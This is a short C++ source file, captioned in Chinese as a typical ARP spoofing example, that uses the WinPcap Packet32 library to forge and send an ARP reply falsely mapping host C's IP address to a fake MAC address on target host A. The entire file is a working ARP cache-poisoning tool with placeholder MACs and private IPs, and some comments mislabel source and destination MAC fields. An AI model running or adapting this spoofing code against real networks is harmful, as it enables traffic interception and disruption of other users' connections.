arpspoof_new.cpp

典型的arp欺骗

#include "stdafx.h"
//#include "Mac.h"    //GetMacAddr()，我写的把字符串转换为MAC地址的函数，就不列在这里了
#include <stdio.h>
#include <Packet32.h>

#define EPT_IP        0x0800            /* type: IP    */
#define EPT_ARP        0x0806            /* type: ARP */
#define EPT_RARP    0x8035            /* type: RARP */
#define ARP_HARDWARE 0x0001            /* Dummy type for 802.3 frames  */
#define    ARP_REQUEST    0x0001            /* ARP request */
#define    ARP_REPLY    0x0002            /* ARP reply */

#define Max_Num_Adapter 10

#pragma pack(push, 1)

typedef struct ehhdr 
{
    unsigned char    eh_dst[6];        /* destination ethernet addrress */
    unsigned char    eh_src[6];        /* source ethernet addresss */
    unsigned short    eh_type;        /* ethernet pachet type    */
}EHHDR, *PEHHDR;


typedef struct arphdr
{
    unsigned short    arp_hrd;            /* format of hardware address */
    unsigned short    arp_pro;            /* format of protocol address */
    unsigned char    arp_hln;            /* length of hardware address */
    unsigned char    arp_pln;            /* length of protocol address */
    unsigned short    arp_op;                /* ARP/RARP operation */

    unsigned char    arp_sha[6];            /* sender hardware address */
    unsigned long    arp_spa;            /* sender protocol address */
    unsigned char    arp_tha[6];            /* target hardware address */
    unsigned long    arp_tpa;            /* target protocol address */
}ARPHDR, *PARPHDR;

typedef struct arpPacket
{
    EHHDR    ehhdr;
    ARPHDR    arphdr;
} ARPPACKET, *PARPPACKET;

#pragma pack(pop)


//将字符串转换成mac地址的函数
BOOL GetMacAddr(char *s,char *mac)  
{
    // mac address *must* be in form 001122334455
    int i;
    char tmp[3];
    for (i = 0; i < 6; i++)
    {
        memset(tmp, 0, 3);
        strncpy(tmp, s+i*2, 2);
        mac[i] = (unsigned char)strtol(tmp, NULL, 16);
    }
	return TRUE;
}

int main(int argc, char* argv[])
{
    static char AdapterList[Max_Num_Adapter][1024];    
    char szPacketBuf[600];
    char MacAddr[6];

    LPADAPTER    lpAdapter;
    LPPACKET    lpPacket;
    WCHAR        AdapterName[2048];
    WCHAR        *temp,*temp1;
    ARPPACKET ARPPacket;

    ULONG AdapterLength = 1024;
    
    int AdapterNum = 0;
    int nRetCode, i;

    //Get The list of Adapter
    if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE)
    {
        printf("Unable to retrieve the list of the adapters!\n");
        return 0;
    }

    temp = AdapterName;
    temp1=AdapterName;
    i = 0;
    while ((*temp != '\0')||(*(temp-1) != '\0'))
    {
        if (*temp == '\0') 
        {
            memcpy(AdapterList[i],temp1,(temp-temp1)*2);
            temp1=temp+1;
            i++;
        }
        
        temp++;
    }
    
    AdapterNum = i;
    for (i = 0; i < AdapterNum; i++)
        wprintf(L"\n%d- %s\n", i+1, AdapterList[i]);
    printf("\n");
    
    //Default open the 0
    lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[0]);
        //取第一个网卡（假设啦）

    if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
    {
        nRetCode = GetLastError();
        printf("Unable to open the driver, Error Code : %lx\n", nRetCode);
        return 0;
    }

    lpPacket = PacketAllocatePacket();
    if(lpPacket == NULL)
    {
        printf("\nError:failed to allocate the LPPACKET structure.");
        return 0;
    }

    ZeroMemory(szPacketBuf, sizeof(szPacketBuf));

    if (!GetMacAddr("BBBBBBBBBBBB", MacAddr))
    {
        printf ("Get Mac address error!\n");
    }
    memcpy(ARPPacket.ehhdr.eh_dst, MacAddr, 6);    //源MAC地址

    if (!GetMacAddr("AAAAAAAAAAAA", MacAddr))
    {
        printf ("Get Mac address error!\n");
        return 0;
    }
    memcpy(ARPPacket.ehhdr.eh_src, MacAddr, 6);    //目的MAC地址。（A的地址）

    ARPPacket.ehhdr.eh_type = htons(EPT_ARP);

    ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE);
    ARPPacket.arphdr.arp_pro = htons(EPT_IP);
    ARPPacket.arphdr.arp_hln = 6;
    ARPPacket.arphdr.arp_pln = 4;
    ARPPacket.arphdr.arp_op = htons(ARP_REPLY);

    if (!GetMacAddr("DDDDDDDDDDDD", MacAddr))
    {
        printf ("Get Mac address error!\n");
        return 0;
    }
    memcpy(ARPPacket.arphdr.arp_sha, MacAddr, 6);    //伪造的C的MAC地址
    ARPPacket.arphdr.arp_spa = inet_addr("192.168.10.3");   //C的IP地址

    if (!GetMacAddr("AAAAAAAAAAAA", MacAddr))
    {
        printf ("Get Mac address error!\n");
        return 0;
    }
    memcpy(ARPPacket.arphdr.arp_tha , MacAddr, 6);  //目标A的MAC地址
    ARPPacket.arphdr.arp_tpa = inet_addr("192.168.10.1");   //目标A的IP地址

    memcpy(szPacketBuf, (char*)&ARPPacket, sizeof(ARPPacket));
    PacketInitPacket(lpPacket, szPacketBuf, 60);

    if(PacketSetNumWrites(lpAdapter, 2)==FALSE)
    {
        printf("warning: Unable to send more than one packet in a single write!\n");
    }
    
    if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)
    {
        printf("Error sending the packets!\n");
        return 0;
    }

    printf ("Send ok!\n");

    // close the adapter and exit
    PacketFreePacket(lpPacket);
    PacketCloseAdapter(lpAdapter);
    return 0;
}